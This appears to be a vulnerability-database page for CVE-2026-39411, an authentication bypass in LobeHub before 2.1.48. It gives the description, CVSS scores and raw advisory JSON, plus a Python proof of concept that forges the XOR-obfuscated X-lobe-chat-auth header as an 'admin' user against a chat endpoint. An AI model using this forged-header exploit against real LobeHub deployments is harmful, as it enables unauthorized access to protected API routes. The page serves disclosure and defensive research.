Security Vulnerability Report
中文
CVE-2026-39411 CVSS 5.0 MEDIUM

CVE-2026-39411

Published: 2026-04-08 20:16:26
Last Modified: 2026-04-20 15:03:17
Source: [email protected]

Description

LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, the webapi authentication layer trusts a client-controlled X-lobe-chat-auth header that is only XOR-obfuscated, not signed or otherwise authenticated. Because the XOR key is hardcoded in the repository, an attacker can forge arbitrary auth payloads and bypass authentication on protected webapi routes. Affected routes include /webapi/chat/[provider], /webapi/models/[provider], /webapi/models/[provider]/pull, and /webapi/create-image/comfyui. This vulnerability is fixed in 2.1.48.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:lobehub:lobehub:*:*:*:*:*:node.js:*:* - VULNERABLE
LobeHub < 2.1.48

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import base64 import json # The XOR key is hardcoded in the repository. # This is a placeholder; the actual key needs to be extracted from the source code. XOR_KEY = b"YOUR_HARD_CODED_XOR_KEY" def xor_encrypt(data: bytes, key: bytes) -> bytes: """XOR encrypt/decrypt data with the given key.""" return bytes([b ^ key[i % len(key)] for i, b in enumerate(data)]) def forge_auth_header(payload: dict) -> str: """Forges the X-lobe-chat-auth header value.""" payload_str = json.dumps(payload) payload_bytes = payload_str.encode('utf-8') encrypted_bytes = xor_encrypt(payload_bytes, XOR_KEY) return base64.b64encode(encrypted_bytes).decode('utf-8') # Target endpoint vulnerable to authentication bypass target_url = "http://<target-host>/webapi/chat/openai" # Payload to forge (e.g., impersonating an admin or a valid user) # Adjust the structure based on the actual application logic malicious_payload = { "userId": "admin", "apiKey": "fake_api_key" } # Generate the forged token forged_token = forge_auth_header(malicious_payload) headers = { "X-lobe-chat-auth": forged_token, "Content-Type": "application/json" } try: response = requests.post(target_url, headers=headers) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") if response.status_code == 200: print("[+] Authentication bypass successful!") else: print("[-] Request failed, check parameters.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39411", "sourceIdentifier": "[email protected]", "published": "2026-04-08T20:16:25.560", "lastModified": "2026-04-20T15:03:17.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, the webapi authentication layer trusts a client-controlled X-lobe-chat-auth header that is only XOR-obfuscated, not signed or otherwise authenticated. Because the XOR key is hardcoded in the repository, an attacker can forge arbitrary auth payloads and bypass authentication on protected webapi routes. Affected routes include /webapi/chat/[provider], /webapi/models/[provider], /webapi/models/[provider]/pull, and /webapi/create-image/comfyui. This vulnerability is fixed in 2.1.48."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-290"}, {"lang": "en", "value": "CWE-345"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lobehub:lobehub:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.1.48", "matchCriteriaId": "1D7F83BA-FA07-4B09-BC8E-9F9B4609E770"}]}]}], "references": [{"url": "https://github.com/lobehub/lobehub/commit/3327b293d66c013f076cbc16cdbd05a61a3d0428", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/lobehub/lobehub/pull/13535", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/lobehub/lobehub/releases/tag/v2.1.48", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-5mwj-v5jw-5c97", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-5mwj-v5jw-5c97", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.